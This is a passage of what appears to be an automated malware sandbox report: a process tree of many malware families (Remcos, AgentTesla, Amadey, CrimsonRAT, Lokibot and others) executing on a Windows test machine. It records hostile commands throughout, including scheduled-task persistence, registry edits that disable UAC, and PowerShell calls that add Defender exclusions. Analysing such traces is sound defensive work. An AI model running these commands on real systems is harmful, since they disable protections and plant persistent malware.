                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\e43YWWrZYW0u.bat" "
                                                                7⤵
                                                                  PID:5992
                                                                  • C:\Windows\SysWOW64\chcp.com
                                                                    chcp 65001
                                                                    8⤵
                                                                      PID:4700
                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                      ping -n 10 localhost
                                                                      8⤵
                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                      • Runs ping.exe
                                                                      PID:2356
                                                                    • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                      8⤵
                                                                        PID:3448
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                          9⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:5296
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\OZ4rgU7Dcb6Q.bat" "
                                                                          9⤵
                                                                            PID:5240
                                                                            • C:\Windows\SysWOW64\chcp.com
                                                                              chcp 65001
                                                                              10⤵
                                                                                PID:5868
                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                ping -n 10 localhost
                                                                                10⤵
                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                • Runs ping.exe
                                                                                PID:5944
                                                                              • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                10⤵
                                                                                  PID:4672
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                    11⤵
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:2424
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\3vVQsTO5498q.bat" "
                                                                                    11⤵
                                                                                      PID:1768
                                                                                      • C:\Windows\SysWOW64\chcp.com
                                                                                        chcp 65001
                                                                                        12⤵
                                                                                          PID:5112
                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                          ping -n 10 localhost
                                                                                          12⤵
                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                          • Runs ping.exe
                                                                                          PID:3656
                                                                                        • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                          12⤵
                                                                                            PID:5248
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                              13⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:1204
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\R35IcFeR2eLr.bat" "
                                                                                              13⤵
                                                                                                PID:4924
                                                                                                • C:\Windows\SysWOW64\chcp.com
                                                                                                  chcp 65001
                                                                                                  14⤵
                                                                                                    PID:4288
                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                    ping -n 10 localhost
                                                                                                    14⤵
                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                    • Runs ping.exe
                                                                                                    PID:5124
                                                                                                  • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                                    14⤵
                                                                                                      PID:3448
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                        15⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:6036
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\AOfmonSkJ6TS.bat" "
                                                                                                        15⤵
                                                                                                          PID:4244
                                                                                                          • C:\Windows\SysWOW64\chcp.com
                                                                                                            chcp 65001
                                                                                                            16⤵
                                                                                                              PID:4052
                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                              ping -n 10 localhost
                                                                                                              16⤵
                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                              • Runs ping.exe
                                                                                                              PID:228
                                                                                                            • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                                              16⤵
                                                                                                                PID:3996
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                  17⤵
                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                  PID:1044
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2AsMdjci508c.bat" "
                                                                                                                  17⤵
                                                                                                                    PID:2728
                                                                                                                    • C:\Windows\SysWOW64\chcp.com
                                                                                                                      chcp 65001
                                                                                                                      18⤵
                                                                                                                        PID:4120
                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                        ping -n 10 localhost
                                                                                                                        18⤵
                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                        • Runs ping.exe
                                                                                                                        PID:4588
                                                                                                                      • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                                                        18⤵
                                                                                                                          PID:5180
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                            19⤵
                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                            PID:6012
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\EQ7FQHcIwoT1.bat" "
                                                                                                                            19⤵
                                                                                                                              PID:5868
                                                                                                                              • C:\Windows\SysWOW64\chcp.com
                                                                                                                                chcp 65001
                                                                                                                                20⤵
                                                                                                                                  PID:4156
                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                  ping -n 10 localhost
                                                                                                                                  20⤵
                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                  • Runs ping.exe
                                                                                                                                  PID:3356
                                                                                                                                • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                                                                  20⤵
                                                                                                                                    PID:7808
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                      21⤵
                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                      PID:7984
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\Xm8YvO4tinP8.bat" "
                                                                                                                                      21⤵
                                                                                                                                        PID:8080
                                                                                                                                        • C:\Windows\SysWOW64\chcp.com
                                                                                                                                          chcp 65001
                                                                                                                                          22⤵
                                                                                                                                            PID:8108
                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                            ping -n 10 localhost
                                                                                                                                            22⤵
                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                            • Runs ping.exe
                                                                                                                                            PID:8116
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                                                                            22⤵
                                                                                                                                              PID:7616
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                                23⤵
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:7772
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\3pObrAzl8zLg.bat" "
                                                                                                                                                23⤵
                                                                                                                                                  PID:7888
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\amadey.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\amadey.exe"
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:2704
                                                                                                          • C:\ProgramData\a5410c88f1\bween.exe
                                                                                                            "C:\ProgramData\a5410c88f1\bween.exe"
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:2980
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\a5410c88f1\
                                                                                                              5⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2632
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\a5410c88f1\
                                                                                                                6⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:2140
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe"
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Drops file in Program Files directory
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:1048
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe"
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:592
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe"
                                                                                                            4⤵
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Modifies registry class
                                                                                                            • NTFS ADS
                                                                                                            PID:880
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup-25031539351.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\\setup-25031539351.exe
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2500
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe"
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Drops file in Program Files directory
                                                                                                          PID:836
                                                                                                          • C:\ProgramData\Hdlharas\dlrarhsiva.exe
                                                                                                            "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:2936
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe"
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:1288
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe"
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:1552
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe"
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            PID:644
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe"
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:320
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe"
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:3896
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Discord Free Nitros.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Discord Free Nitros.exe"
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:1788
                                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                                            "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "'Minecraft"' /tr "'C:\Users\Admin\AppData\Roaming\Minecraft.exe"'
                                                                                                            4⤵
                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                            PID:4040
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpDA0A.tmp.bat""
                                                                                                            4⤵
                                                                                                              PID:3260
                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                timeout 3
                                                                                                                5⤵
                                                                                                                • Delays execution with timeout.exe
                                                                                                                PID:5684
                                                                                                              • C:\Users\Admin\AppData\Roaming\Minecraft.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\Minecraft.exe"
                                                                                                                5⤵
                                                                                                                  PID:5360
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe"
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:1700
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr" /S
                                                                                                              3⤵
                                                                                                              • Modifies firewall policy service
                                                                                                              • UAC bypass
                                                                                                              • Windows security bypass
                                                                                                              • Executes dropped EXE
                                                                                                              • Windows security modification
                                                                                                              • Checks whether UAC is enabled
                                                                                                              • Enumerates connected drives
                                                                                                              • Drops file in Windows directory
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              • System policy modification
                                                                                                              PID:1012
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe" /S
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:3984
                                                                                                                • C:\Users\Admin\AppData\Local\server.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\server.exe"
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:588
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe" /S
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3616
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Lokibot.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Lokibot.exe"
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:3856
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Lokibot.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Lokibot.exe"
                                                                                                                4⤵
                                                                                                                  PID:4144
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:3992
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
                                                                                                                  4⤵
                                                                                                                    PID:3652
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\VixenLoader.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\VixenLoader.exe"
                                                                                                                      5⤵
                                                                                                                        PID:3200
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\taskhostw.exe'
                                                                                                                          6⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          PID:2740
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhostw.exe'
                                                                                                                          6⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          PID:4256
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpE2FF.tmp.bat""
                                                                                                                          6⤵
                                                                                                                            PID:5204
                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                              timeout 3
                                                                                                                              7⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:3180
                                                                                                                      • C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                        "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                        4⤵
                                                                                                                          PID:644
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
                                                                                                                            5⤵
                                                                                                                              PID:1520
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\x.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\x.exe"
                                                                                                                                6⤵
                                                                                                                                  PID:2860
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\shwork.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\shwork.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:3548
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\javaw.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\javaw.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:5344
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\ori.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\ori.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:3960
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 684
                                                                                                                                          7⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:5876
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\we.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\we.exe"
                                                                                                                                        6⤵
                                                                                                                                          PID:5116
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\rem.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\rem.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:1612
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 700
                                                                                                                                              7⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:6748
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:6772
                                                                                                                                              • C:\Windows\TEMP\{F79EB6A0-77BB-4AC2-8A43-8353A34BDB92}\.cr\xmsn.exe
                                                                                                                                                "C:\Windows\TEMP\{F79EB6A0-77BB-4AC2-8A43-8353A34BDB92}\.cr\xmsn.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe" -burn.filehandle.attached=188 -burn.filehandle.self=184
                                                                                                                                                7⤵
                                                                                                                                                  PID:6864
                                                                                                                                                  • C:\Windows\TEMP\{1DD6FFEB-C0BF-4A6A-AA4B-649DFEB7ED9D}\.ba\msn.exe
                                                                                                                                                    C:\Windows\TEMP\{1DD6FFEB-C0BF-4A6A-AA4B-649DFEB7ED9D}\.ba\msn.exe
                                                                                                                                                    8⤵
                                                                                                                                                      PID:6996
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\AltApp_v4\msn.exe
                                                                                                                                                        C:\Users\Admin\AppData\Roaming\AltApp_v4\msn.exe
                                                                                                                                                        9⤵
                                                                                                                                                          PID:7116
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            10⤵
                                                                                                                                                              PID:7760
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\OkH8IPF.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\OkH8IPF.exe"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:7044
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\tK0oYx3.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\tK0oYx3.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:3804
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\zx4PJh6.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\zx4PJh6.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:2028
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\malware.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\malware.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:4076
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 56
                                                                                                                                                        4⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:2556
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\VirusShare_fff8783b7567821cec8838d075d247e1.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\VirusShare_fff8783b7567821cec8838d075d247e1.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:2940
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SteamOBrute.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\SteamOBrute.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Writes to the Master Boot Record (MBR)
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                      PID:2144
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\NetWire.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\NetWire.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:3160
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\NetWire.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\NetWire.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:4056
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\VirusShare_0ac0c5dc1e706e301c8f902b78c41e3b.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\VirusShare_0ac0c5dc1e706e301c8f902b78c41e3b.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:3180
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3180 -s 1116
                                                                                                                                                        4⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:3260
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\TEAM BLUE CLIENT.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\TEAM BLUE CLIENT.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:3208
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Remcos.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Remcos.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:3248
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                        4⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:3360
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                          5⤵
                                                                                                                                                          • UAC bypass
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          • Modifies registry key
                                                                                                                                                          PID:4036
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1972
                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                            PING 127.0.0.1 -n 2
                                                                                                                                                            5⤵
                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                            • Runs ping.exe
                                                                                                                                                            PID:1744
                                                                                                                                                          • C:\Windows\SysWOW64\Userdata\Userdata.exe
                                                                                                                                                            "C:\Windows\SysWOW64\Userdata\Userdata.exe"
                                                                                                                                                            5⤵
                                                                                                                                                              PID:5072
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:572
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                    PID:4116
                                                                                                                                                                • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                  "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:4036
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:4176
